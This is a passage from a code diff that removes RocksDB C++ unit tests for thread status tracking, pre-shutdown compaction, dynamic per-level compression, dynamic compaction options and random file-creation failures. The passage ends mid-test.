-  TEST_SYNC_POINT("DBTest::ThreadStatusFlush:1");
-  VerifyOperationCount(env_, ThreadStatus::OP_FLUSH, 1);
-  db_->GetIntProperty(DB::Properties::kNumRunningFlushes, &num_running_flushes);
-  ASSERT_EQ(num_running_flushes, 1);
-  // This second sync point is to ensure the flush job will not
-  // be completed until we already perform VerifyOperationCount().
-  TEST_SYNC_POINT("DBTest::ThreadStatusFlush:2");
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBTestWithParam, ThreadStatusSingleCompaction) {
-  const int kTestKeySize = 16;
-  const int kTestValueSize = 984;
-  const int kEntrySize = kTestKeySize + kTestValueSize;
-  const int kEntriesPerBuffer = 100;
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = kEntrySize * kEntriesPerBuffer;
-  options.compaction_style = kCompactionStyleLevel;
-  options.target_file_size_base = options.write_buffer_size;
-  options.max_bytes_for_level_base = options.target_file_size_base * 2;
-  options.max_bytes_for_level_multiplier = 2;
-  options.compression = kNoCompression;
-  options = CurrentOptions(options);
-  options.env = env_;
-  options.enable_thread_tracking = true;
-  const int kNumL0Files = 4;
-  options.level0_file_num_compaction_trigger = kNumL0Files;
-  options.max_subcompactions = max_subcompactions_;
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DBTest::ThreadStatusSingleCompaction:0", "DBImpl::BGWorkCompaction"},
-      {"CompactionJob::Run():Start", "DBTest::ThreadStatusSingleCompaction:1"},
-      {"DBTest::ThreadStatusSingleCompaction:2", "CompactionJob::Run():End"},
-  });
-  for (int tests = 0; tests < 2; ++tests) {
-    DestroyAndReopen(options);
-    rocksdb::SyncPoint::GetInstance()->ClearTrace();
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    Random rnd(301);
-    // The Put Phase.
-    for (int file = 0; file < kNumL0Files; ++file) {
-      for (int key = 0; key < kEntriesPerBuffer; ++key) {
-        ASSERT_OK(Put(ToString(key + file * kEntriesPerBuffer),
-                      RandomString(&rnd, kTestValueSize)));
-      }
-      Flush();
-    }
-    // This makes sure a compaction won't be scheduled until
-    // we have done with the above Put Phase.
-    uint64_t num_running_compactions = 0;
-    db_->GetIntProperty(DB::Properties::kNumRunningCompactions,
-                        &num_running_compactions);
-    ASSERT_EQ(num_running_compactions, 0);
-    TEST_SYNC_POINT("DBTest::ThreadStatusSingleCompaction:0");
-    ASSERT_GE(NumTableFilesAtLevel(0),
-              options.level0_file_num_compaction_trigger);
-
-    // This makes sure at least one compaction is running.
-    TEST_SYNC_POINT("DBTest::ThreadStatusSingleCompaction:1");
-
-    if (options.enable_thread_tracking) {
-      // expecting one single L0 to L1 compaction
-      VerifyOperationCount(env_, ThreadStatus::OP_COMPACTION, 1);
-    } else {
-      // If thread tracking is not enabled, compaction count should be 0.
-      VerifyOperationCount(env_, ThreadStatus::OP_COMPACTION, 0);
-    }
-    db_->GetIntProperty(DB::Properties::kNumRunningCompactions,
-                        &num_running_compactions);
-    ASSERT_EQ(num_running_compactions, 1);
-    // TODO(yhchiang): adding assert to verify each compaction stage.
-    TEST_SYNC_POINT("DBTest::ThreadStatusSingleCompaction:2");
-
-    // repeat the test with disabling thread tracking.
-    options.enable_thread_tracking = false;
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-}
-
-TEST_P(DBTestWithParam, PreShutdownManualCompaction) {
-  Options options = CurrentOptions();
-  options.max_subcompactions = max_subcompactions_;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // iter - 0 with 7 levels
-  // iter - 1 with 3 levels
-  for (int iter = 0; iter < 2; ++iter) {
-    MakeTables(3, "p", "q", 1);
-    ASSERT_EQ("1,1,1", FilesPerLevel(1));
-
-    // Compaction range falls before files
-    Compact(1, "", "c");
-    ASSERT_EQ("1,1,1", FilesPerLevel(1));
-
-    // Compaction range falls after files
-    Compact(1, "r", "z");
-    ASSERT_EQ("1,1,1", FilesPerLevel(1));
-
-    // Compaction range overlaps files
-    Compact(1, "p1", "p9");
-    ASSERT_EQ("0,0,1", FilesPerLevel(1));
-
-    // Populate a different range
-    MakeTables(3, "c", "e", 1);
-    ASSERT_EQ("1,1,2", FilesPerLevel(1));
-
-    // Compact just the new range
-    Compact(1, "b", "f");
-    ASSERT_EQ("0,0,2", FilesPerLevel(1));
-
-    // Compact all
-    MakeTables(1, "a", "z", 1);
-    ASSERT_EQ("1,0,2", FilesPerLevel(1));
-    CancelAllBackgroundWork(db_);
-    db_->CompactRange(CompactRangeOptions(), handles_[1], nullptr, nullptr);
-    ASSERT_EQ("1,0,2", FilesPerLevel(1));
-
-    if (iter == 0) {
-      options = CurrentOptions();
-      options.num_levels = 3;
-      options.create_if_missing = true;
-      DestroyAndReopen(options);
-      CreateAndReopenWithCF({"pikachu"}, options);
-    }
-  }
-}
-
-TEST_F(DBTest, PreShutdownFlush) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  ASSERT_OK(Put(1, "key", "value"));
-  CancelAllBackgroundWork(db_);
-  Status s =
-      db_->CompactRange(CompactRangeOptions(), handles_[1], nullptr, nullptr);
-  ASSERT_TRUE(s.IsShutdownInProgress());
-}
-
-TEST_P(DBTestWithParam, PreShutdownMultipleCompaction) {
-  const int kTestKeySize = 16;
-  const int kTestValueSize = 984;
-  const int kEntrySize = kTestKeySize + kTestValueSize;
-  const int kEntriesPerBuffer = 40;
-  const int kNumL0Files = 4;
-
-  const int kHighPriCount = 3;
-  const int kLowPriCount = 5;
-  env_->SetBackgroundThreads(kHighPriCount, Env::HIGH);
-  env_->SetBackgroundThreads(kLowPriCount, Env::LOW);
-
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = kEntrySize * kEntriesPerBuffer;
-  options.compaction_style = kCompactionStyleLevel;
-  options.target_file_size_base = options.write_buffer_size;
-  options.max_bytes_for_level_base =
-      options.target_file_size_base * kNumL0Files;
-  options.compression = kNoCompression;
-  options = CurrentOptions(options);
-  options.env = env_;
-  options.enable_thread_tracking = true;
-  options.level0_file_num_compaction_trigger = kNumL0Files;
-  options.max_bytes_for_level_multiplier = 2;
-  options.max_background_compactions = kLowPriCount;
-  options.level0_stop_writes_trigger = 1 << 10;
-  options.level0_slowdown_writes_trigger = 1 << 10;
-  options.max_subcompactions = max_subcompactions_;
-
-  TryReopen(options);
-  Random rnd(301);
-
-  std::vector<ThreadStatus> thread_list;
-  // Delay both flush and compaction
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"FlushJob::FlushJob()", "CompactionJob::Run():Start"},
-       {"CompactionJob::Run():Start",
-        "DBTest::PreShutdownMultipleCompaction:Preshutdown"},
-       {"CompactionJob::Run():Start",
-        "DBTest::PreShutdownMultipleCompaction:VerifyCompaction"},
-       {"DBTest::PreShutdownMultipleCompaction:Preshutdown",
-        "CompactionJob::Run():End"},
-       {"CompactionJob::Run():End",
-        "DBTest::PreShutdownMultipleCompaction:VerifyPreshutdown"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Make rocksdb busy
-  int key = 0;
-  // check how many threads are doing compaction using GetThreadList
-  int operation_count[ThreadStatus::NUM_OP_TYPES] = {0};
-  for (int file = 0; file < 16 * kNumL0Files; ++file) {
-    for (int k = 0; k < kEntriesPerBuffer; ++k) {
-      ASSERT_OK(Put(ToString(key++), RandomString(&rnd, kTestValueSize)));
-    }
-
-    Status s = env_->GetThreadList(&thread_list);
-    for (auto thread : thread_list) {
-      operation_count[thread.operation_type]++;
-    }
-
-    // Speed up the test
-    if (operation_count[ThreadStatus::OP_FLUSH] > 1 &&
-        operation_count[ThreadStatus::OP_COMPACTION] >
-            0.6 * options.max_background_compactions) {
-      break;
-    }
-    if (file == 15 * kNumL0Files) {
-      TEST_SYNC_POINT("DBTest::PreShutdownMultipleCompaction:Preshutdown");
-    }
-  }
-
-  TEST_SYNC_POINT("DBTest::PreShutdownMultipleCompaction:Preshutdown");
-  ASSERT_GE(operation_count[ThreadStatus::OP_COMPACTION], 1);
-  CancelAllBackgroundWork(db_);
-  TEST_SYNC_POINT("DBTest::PreShutdownMultipleCompaction:VerifyPreshutdown");
-  dbfull()->TEST_WaitForCompact();
-  // Record the number of compactions at a time.
-  for (int i = 0; i < ThreadStatus::NUM_OP_TYPES; ++i) {
-    operation_count[i] = 0;
-  }
-  Status s = env_->GetThreadList(&thread_list);
-  for (auto thread : thread_list) {
-    operation_count[thread.operation_type]++;
-  }
-  ASSERT_EQ(operation_count[ThreadStatus::OP_COMPACTION], 0);
-}
-
-TEST_P(DBTestWithParam, PreShutdownCompactionMiddle) {
-  const int kTestKeySize = 16;
-  const int kTestValueSize = 984;
-  const int kEntrySize = kTestKeySize + kTestValueSize;
-  const int kEntriesPerBuffer = 40;
-  const int kNumL0Files = 4;
-
-  const int kHighPriCount = 3;
-  const int kLowPriCount = 5;
-  env_->SetBackgroundThreads(kHighPriCount, Env::HIGH);
-  env_->SetBackgroundThreads(kLowPriCount, Env::LOW);
-
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = kEntrySize * kEntriesPerBuffer;
-  options.compaction_style = kCompactionStyleLevel;
-  options.target_file_size_base = options.write_buffer_size;
-  options.max_bytes_for_level_base =
-      options.target_file_size_base * kNumL0Files;
-  options.compression = kNoCompression;
-  options = CurrentOptions(options);
-  options.env = env_;
-  options.enable_thread_tracking = true;
-  options.level0_file_num_compaction_trigger = kNumL0Files;
-  options.max_bytes_for_level_multiplier = 2;
-  options.max_background_compactions = kLowPriCount;
-  options.level0_stop_writes_trigger = 1 << 10;
-  options.level0_slowdown_writes_trigger = 1 << 10;
-  options.max_subcompactions = max_subcompactions_;
-
-  TryReopen(options);
-  Random rnd(301);
-
-  std::vector<ThreadStatus> thread_list;
-  // Delay both flush and compaction
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBTest::PreShutdownCompactionMiddle:Preshutdown",
-        "CompactionJob::Run():Inprogress"},
-       {"CompactionJob::Run():Start",
-        "DBTest::PreShutdownCompactionMiddle:VerifyCompaction"},
-       {"CompactionJob::Run():Inprogress", "CompactionJob::Run():End"},
-       {"CompactionJob::Run():End",
-        "DBTest::PreShutdownCompactionMiddle:VerifyPreshutdown"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Make rocksdb busy
-  int key = 0;
-  // check how many threads are doing compaction using GetThreadList
-  int operation_count[ThreadStatus::NUM_OP_TYPES] = {0};
-  for (int file = 0; file < 16 * kNumL0Files; ++file) {
-    for (int k = 0; k < kEntriesPerBuffer; ++k) {
-      ASSERT_OK(Put(ToString(key++), RandomString(&rnd, kTestValueSize)));
-    }
-
-    Status s = env_->GetThreadList(&thread_list);
-    for (auto thread : thread_list) {
-      operation_count[thread.operation_type]++;
-    }
-
-    // Speed up the test
-    if (operation_count[ThreadStatus::OP_FLUSH] > 1 &&
-        operation_count[ThreadStatus::OP_COMPACTION] >
-            0.6 * options.max_background_compactions) {
-      break;
-    }
-    if (file == 15 * kNumL0Files) {
-      TEST_SYNC_POINT("DBTest::PreShutdownCompactionMiddle:VerifyCompaction");
-    }
-  }
-
-  ASSERT_GE(operation_count[ThreadStatus::OP_COMPACTION], 1);
-  CancelAllBackgroundWork(db_);
-  TEST_SYNC_POINT("DBTest::PreShutdownCompactionMiddle:Preshutdown");
-  TEST_SYNC_POINT("DBTest::PreShutdownCompactionMiddle:VerifyPreshutdown");
-  dbfull()->TEST_WaitForCompact();
-  // Record the number of compactions at a time.
-  for (int i = 0; i < ThreadStatus::NUM_OP_TYPES; ++i) {
-    operation_count[i] = 0;
-  }
-  Status s = env_->GetThreadList(&thread_list);
-  for (auto thread : thread_list) {
-    operation_count[thread.operation_type]++;
-  }
-  ASSERT_EQ(operation_count[ThreadStatus::OP_COMPACTION], 0);
-}
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, FlushOnDestroy) {
-  WriteOptions wo;
-  wo.disableWAL = true;
-  ASSERT_OK(Put("foo", "v1", wo));
-  CancelAllBackgroundWork(db_);
-}
-
-TEST_F(DBTest, DynamicLevelCompressionPerLevel) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-  const int kNKeys = 120;
-  int keys[kNKeys];
-  for (int i = 0; i < kNKeys; i++) {
-    keys[i] = i;
-  }
-  std::random_shuffle(std::begin(keys), std::end(keys));
-
-  Random rnd(301);
-  Options options;
-  options.create_if_missing = true;
-  options.db_write_buffer_size = 20480;
-  options.write_buffer_size = 20480;
-  options.max_write_buffer_number = 2;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 2;
-  options.target_file_size_base = 20480;
-  options.level_compaction_dynamic_level_bytes = true;
-  options.max_bytes_for_level_base = 102400;
-  options.max_bytes_for_level_multiplier = 4;
-  options.max_background_compactions = 1;
-  options.num_levels = 5;
-
-  options.compression_per_level.resize(3);
-  options.compression_per_level[0] = kNoCompression;
-  options.compression_per_level[1] = kNoCompression;
-  options.compression_per_level[2] = kSnappyCompression;
-
-  OnFileDeletionListener* listener = new OnFileDeletionListener();
-  options.listeners.emplace_back(listener);
-
-  DestroyAndReopen(options);
-
-  // Insert more than 80K. L4 should be base level. Neither L0 nor L4 should
-  // be compressed, so total data size should be more than 80K.
-  for (int i = 0; i < 20; i++) {
-    ASSERT_OK(Put(Key(keys[i]), CompressibleString(&rnd, 4000)));
-  }
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ(NumTableFilesAtLevel(1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(3), 0);
-  // Assuming each files' metadata is at least 50 bytes/
-  ASSERT_GT(SizeAtLevel(0) + SizeAtLevel(4), 20U * 4000U + 50U * 4);
-
-  // Insert 400KB. Some data will be compressed
-  for (int i = 21; i < 120; i++) {
-    ASSERT_OK(Put(Key(keys[i]), CompressibleString(&rnd, 4000)));
-  }
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(NumTableFilesAtLevel(1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2), 0);
-  ASSERT_LT(SizeAtLevel(0) + SizeAtLevel(3) + SizeAtLevel(4),
-            120U * 4000U + 50U * 24);
-  // Make sure data in files in L3 is not compacted by removing all files
-  // in L4 and calculate number of rows
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "true"},
-  }));
-  ColumnFamilyMetaData cf_meta;
-  db_->GetColumnFamilyMetaData(&cf_meta);
-  for (auto file : cf_meta.levels[4].files) {
-    listener->SetExpectedFileName(dbname_ + file.name);
-    ASSERT_OK(dbfull()->DeleteFile(file.name));
-  }
-  listener->VerifyMatchedCount(cf_meta.levels[4].files.size());
-
-  int num_keys = 0;
-  std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    num_keys++;
-  }
-  ASSERT_OK(iter->status());
-  ASSERT_GT(SizeAtLevel(0) + SizeAtLevel(3), num_keys * 4000U + num_keys * 10U);
-}
-
-TEST_F(DBTest, DynamicLevelCompressionPerLevel2) {
-  if (!Snappy_Supported() || !LZ4_Supported() || !Zlib_Supported()) {
-    return;
-  }
-  const int kNKeys = 500;
-  int keys[kNKeys];
-  for (int i = 0; i < kNKeys; i++) {
-    keys[i] = i;
-  }
-  std::random_shuffle(std::begin(keys), std::end(keys));
-
-  Random rnd(301);
-  Options options;
-  options.create_if_missing = true;
-  options.db_write_buffer_size = 6000000;
-  options.write_buffer_size = 600000;
-  options.max_write_buffer_number = 2;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 2;
-  options.soft_pending_compaction_bytes_limit = 1024 * 1024;
-  options.target_file_size_base = 20;
-
-  options.level_compaction_dynamic_level_bytes = true;
-  options.max_bytes_for_level_base = 200;
-  options.max_bytes_for_level_multiplier = 8;
-  options.max_background_compactions = 1;
-  options.num_levels = 5;
-  std::shared_ptr<mock::MockTableFactory> mtf(new mock::MockTableFactory);
-  options.table_factory = mtf;
-
-  options.compression_per_level.resize(3);
-  options.compression_per_level[0] = kNoCompression;
-  options.compression_per_level[1] = kLZ4Compression;
-  options.compression_per_level[2] = kZlibCompression;
-
-  DestroyAndReopen(options);
-  // When base level is L4, L4 is LZ4.
-  std::atomic<int> num_zlib(0);
-  std::atomic<int> num_lz4(0);
-  std::atomic<int> num_no(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "LevelCompactionPicker::PickCompaction:Return", [&](void* arg) {
-        Compaction* compaction = reinterpret_cast<Compaction*>(arg);
-        if (compaction->output_level() == 4) {
-          ASSERT_TRUE(compaction->output_compression() == kLZ4Compression);
-          num_lz4.fetch_add(1);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "FlushJob::WriteLevel0Table:output_compression", [&](void* arg) {
-        auto* compression = reinterpret_cast<CompressionType*>(arg);
-        ASSERT_TRUE(*compression == kNoCompression);
-        num_no.fetch_add(1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  for (int i = 0; i < 100; i++) {
-    std::string value = RandomString(&rnd, 200);
-    ASSERT_OK(Put(Key(keys[i]), value));
-    if (i % 25 == 24) {
-      Flush();
-      dbfull()->TEST_WaitForCompact();
-    }
-  }
-
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  ASSERT_EQ(NumTableFilesAtLevel(1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(3), 0);
-  ASSERT_GT(NumTableFilesAtLevel(4), 0);
-  ASSERT_GT(num_no.load(), 2);
-  ASSERT_GT(num_lz4.load(), 0);
-  int prev_num_files_l4 = NumTableFilesAtLevel(4);
-
-  // After base level turn L4->L3, L3 becomes LZ4 and L4 becomes Zlib
-  num_lz4.store(0);
-  num_no.store(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "LevelCompactionPicker::PickCompaction:Return", [&](void* arg) {
-        Compaction* compaction = reinterpret_cast<Compaction*>(arg);
-        if (compaction->output_level() == 4 && compaction->start_level() == 3) {
-          ASSERT_TRUE(compaction->output_compression() == kZlibCompression);
-          num_zlib.fetch_add(1);
-        } else {
-          ASSERT_TRUE(compaction->output_compression() == kLZ4Compression);
-          num_lz4.fetch_add(1);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "FlushJob::WriteLevel0Table:output_compression", [&](void* arg) {
-        auto* compression = reinterpret_cast<CompressionType*>(arg);
-        ASSERT_TRUE(*compression == kNoCompression);
-        num_no.fetch_add(1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  for (int i = 101; i < 500; i++) {
-    std::string value = RandomString(&rnd, 200);
-    ASSERT_OK(Put(Key(keys[i]), value));
-    if (i % 100 == 99) {
-      Flush();
-      dbfull()->TEST_WaitForCompact();
-    }
-  }
-
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(NumTableFilesAtLevel(1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2), 0);
-  ASSERT_GT(NumTableFilesAtLevel(3), 0);
-  ASSERT_GT(NumTableFilesAtLevel(4), prev_num_files_l4);
-  ASSERT_GT(num_no.load(), 2);
-  ASSERT_GT(num_lz4.load(), 0);
-  ASSERT_GT(num_zlib.load(), 0);
-}
-
-TEST_F(DBTest, DynamicCompactionOptions) {
-  // minimum write buffer size is enforced at 64KB
-  const uint64_t k32KB = 1 << 15;
-  const uint64_t k64KB = 1 << 16;
-  const uint64_t k128KB = 1 << 17;
-  const uint64_t k1MB = 1 << 20;
-  const uint64_t k4KB = 1 << 12;
-  Options options;
-  options.env = env_;
-  options.create_if_missing = true;
-  options.compression = kNoCompression;
-  options.soft_pending_compaction_bytes_limit = 1024 * 1024;
-  options.write_buffer_size = k64KB;
-  options.arena_block_size = 4 * k4KB;
-  options.max_write_buffer_number = 2;
-  // Compaction related options
-  options.level0_file_num_compaction_trigger = 3;
-  options.level0_slowdown_writes_trigger = 4;
-  options.level0_stop_writes_trigger = 8;
-  options.target_file_size_base = k64KB;
-  options.max_compaction_bytes = options.target_file_size_base * 10;
-  options.target_file_size_multiplier = 1;
-  options.max_bytes_for_level_base = k128KB;
-  options.max_bytes_for_level_multiplier = 4;
-
-  // Block flush thread and disable compaction thread
-  env_->SetBackgroundThreads(1, Env::LOW);
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  DestroyAndReopen(options);
-
-  auto gen_l0_kb = [this](int start, int size, int stride) {
-    Random rnd(301);
-    for (int i = 0; i < size; i++) {
-      ASSERT_OK(Put(Key(start + stride * i), RandomString(&rnd, 1024)));
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-  };
-
-  // Write 3 files that have the same key range.
-  // Since level0_file_num_compaction_trigger is 3, compaction should be
-  // triggered. The compaction should result in one L1 file
-  gen_l0_kb(0, 64, 1);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 1);
-  gen_l0_kb(0, 64, 1);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 2);
-  gen_l0_kb(0, 64, 1);
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,1", FilesPerLevel());
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(1U, metadata.size());
-  ASSERT_LE(metadata[0].size, k64KB + k4KB);
-  ASSERT_GE(metadata[0].size, k64KB - k4KB);
-
-  // Test compaction trigger and target_file_size_base
-  // Reduce compaction trigger to 2, and reduce L1 file size to 32KB.
-  // Writing to 64KB L0 files should trigger a compaction. Since these
-  // 2 L0 files have the same key range, compaction merge them and should
-  // result in 2 32KB L1 files.
-  ASSERT_OK(dbfull()->SetOptions({{"level0_file_num_compaction_trigger", "2"},
-                                  {"target_file_size_base", ToString(k32KB)}}));
-
-  gen_l0_kb(0, 64, 1);
-  ASSERT_EQ("1,1", FilesPerLevel());
-  gen_l0_kb(0, 64, 1);
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,2", FilesPerLevel());
-  metadata.clear();
-  db_->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(2U, metadata.size());
-  ASSERT_LE(metadata[0].size, k32KB + k4KB);
-  ASSERT_GE(metadata[0].size, k32KB - k4KB);
-  ASSERT_LE(metadata[1].size, k32KB + k4KB);
-  ASSERT_GE(metadata[1].size, k32KB - k4KB);
-
-  // Test max_bytes_for_level_base
-  // Increase level base size to 256KB and write enough data that will
-  // fill L1 and L2. L1 size should be around 256KB while L2 size should be
-  // around 256KB x 4.
-  ASSERT_OK(
-      dbfull()->SetOptions({{"max_bytes_for_level_base", ToString(k1MB)}}));
-
-  // writing 96 x 64KB => 6 * 1024KB
-  // (L1 + L2) = (1 + 4) * 1024KB
-  for (int i = 0; i < 96; ++i) {
-    gen_l0_kb(i, 64, 96);
-  }
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_GT(SizeAtLevel(1), k1MB / 2);
-  ASSERT_LT(SizeAtLevel(1), k1MB + k1MB / 2);
-
-  // Within (0.5, 1.5) of 4MB.
-  ASSERT_GT(SizeAtLevel(2), 2 * k1MB);
-  ASSERT_LT(SizeAtLevel(2), 6 * k1MB);
-
-  // Test max_bytes_for_level_multiplier and
-  // max_bytes_for_level_base. Now, reduce both mulitplier and level base,
-  // After filling enough data that can fit in L1 - L3, we should see L1 size
-  // reduces to 128KB from 256KB which was asserted previously. Same for L2.
-  ASSERT_OK(
-      dbfull()->SetOptions({{"max_bytes_for_level_multiplier", "2"},
-                            {"max_bytes_for_level_base", ToString(k128KB)}}));
-
-  // writing 20 x 64KB = 10 x 128KB
-  // (L1 + L2 + L3) = (1 + 2 + 4) * 128KB
-  for (int i = 0; i < 20; ++i) {
-    gen_l0_kb(i, 64, 32);
-  }
-  dbfull()->TEST_WaitForCompact();
-  uint64_t total_size = SizeAtLevel(1) + SizeAtLevel(2) + SizeAtLevel(3);
-  ASSERT_TRUE(total_size < k128KB * 7 * 1.5);
-
-  // Test level0_stop_writes_trigger.
-  // Clean up memtable and L0. Block compaction threads. If continue to write
-  // and flush memtables. We should see put stop after 8 memtable flushes
-  // since level0_stop_writes_trigger = 8
-  dbfull()->TEST_FlushMemTable(true);
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  // Block compaction
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  sleeping_task_low.WaitUntilSleeping();
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-  int count = 0;
-  Random rnd(301);
-  WriteOptions wo;
-  while (count < 64) {
-    ASSERT_OK(Put(Key(count), RandomString(&rnd, 1024), wo));
-    dbfull()->TEST_FlushMemTable(true);
-    count++;
-    if (dbfull()->TEST_write_controler().IsStopped()) {
-      sleeping_task_low.WakeUp();
-      break;
-    }
-  }
-  // Stop trigger = 8
-  ASSERT_EQ(count, 8);
-  // Unblock
-  sleeping_task_low.WaitUntilDone();
-
-  // Now reduce level0_stop_writes_trigger to 6. Clear up memtables and L0.
-  // Block compaction thread again. Perform the put and memtable flushes
-  // until we see the stop after 6 memtable flushes.
-  ASSERT_OK(dbfull()->SetOptions({{"level0_stop_writes_trigger", "6"}}));
-  dbfull()->TEST_FlushMemTable(true);
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-
-  // Block compaction again
-  sleeping_task_low.Reset();
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  sleeping_task_low.WaitUntilSleeping();
-  count = 0;
-  while (count < 64) {
-    ASSERT_OK(Put(Key(count), RandomString(&rnd, 1024), wo));
-    dbfull()->TEST_FlushMemTable(true);
-    count++;
-    if (dbfull()->TEST_write_controler().IsStopped()) {
-      sleeping_task_low.WakeUp();
-      break;
-    }
-  }
-  ASSERT_EQ(count, 6);
-  // Unblock
-  sleeping_task_low.WaitUntilDone();
-
-  // Test disable_auto_compactions
-  // Compaction thread is unblocked but auto compaction is disabled. Write
-  // 4 L0 files and compaction should be triggered. If auto compaction is
-  // disabled, then TEST_WaitForCompact will be waiting for nothing. Number of
-  // L0 files do not change after the call.
-  ASSERT_OK(dbfull()->SetOptions({{"disable_auto_compactions", "true"}}));
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-
-  for (int i = 0; i < 4; ++i) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-    // Wait for compaction so that put won't stop
-    dbfull()->TEST_FlushMemTable(true);
-  }
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(NumTableFilesAtLevel(0), 4);
-
-  // Enable auto compaction and perform the same test, # of L0 files should be
-  // reduced after compaction.
-  ASSERT_OK(dbfull()->SetOptions({{"disable_auto_compactions", "false"}}));
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-
-  for (int i = 0; i < 4; ++i) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-    // Wait for compaction so that put won't stop
-    dbfull()->TEST_FlushMemTable(true);
-  }
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_LT(NumTableFilesAtLevel(0), 4);
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, FileCreationRandomFailure) {
-  Options options;
-  options.env = env_;
-  options.create_if_missing = true;
-  options.write_buffer_size = 100000;  // Small write buffer
-  options.target_file_size_base = 200000;
-  options.max_bytes_for_level_base = 1000000;
-  options.max_bytes_for_level_multiplier = 2;
-
-  DestroyAndReopen(options);
-  Random rnd(301);
-
-  const int kCDTKeysPerBuffer = 4;
-  const int kTestSize = kCDTKeysPerBuffer * 4096;
-  const int kTotalIteration = 100;
-  // the second half of the test involves in random failure
-  // of file creation.
-  const int kRandomFailureTest = kTotalIteration / 2;
-  std::vector<std::string> values;
-  for (int i = 0; i < kTestSize; ++i) {
-    values.push_back("NOT_FOUND");
-  }
-  for (int j = 0; j < kTotalIteration; ++j) {
-    if (j == kRandomFailureTest) {
-      env_->non_writeable_rate_.store(90);
-    }
-    for (int k = 0; k < kTestSize; ++k) {
-      // here we expect some of the Put fails.
-      std::string value = RandomString(&rnd, 100);
-      Status s = Put(Key(k), Slice(value));
-      if (s.ok()) {
-        // update the latest successful put
-        values[k] = value;
-      }
-      // But everything before we simulate the failure-test should succeed.
-      if (j < kRandomFailureTest) {
-        ASSERT_OK(s);
-      }
-    }
-  }
-
-  // If rocksdb does not do the correct job, internal assert will fail here.
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // verify we have the latest successful update
-  for (int k = 0; k < kTestSize; ++k) {
-    auto v = Get(Key(k));
-    ASSERT_EQ(v, values[k]);
-  }
-
-  // reopen and reverify we have the latest successful update
-  env_->non_writeable_rate_.store(0);
-  Reopen(options);
-  for (int k = 0; k < kTestSize; ++k) {
-    auto v = Get(Key(k));
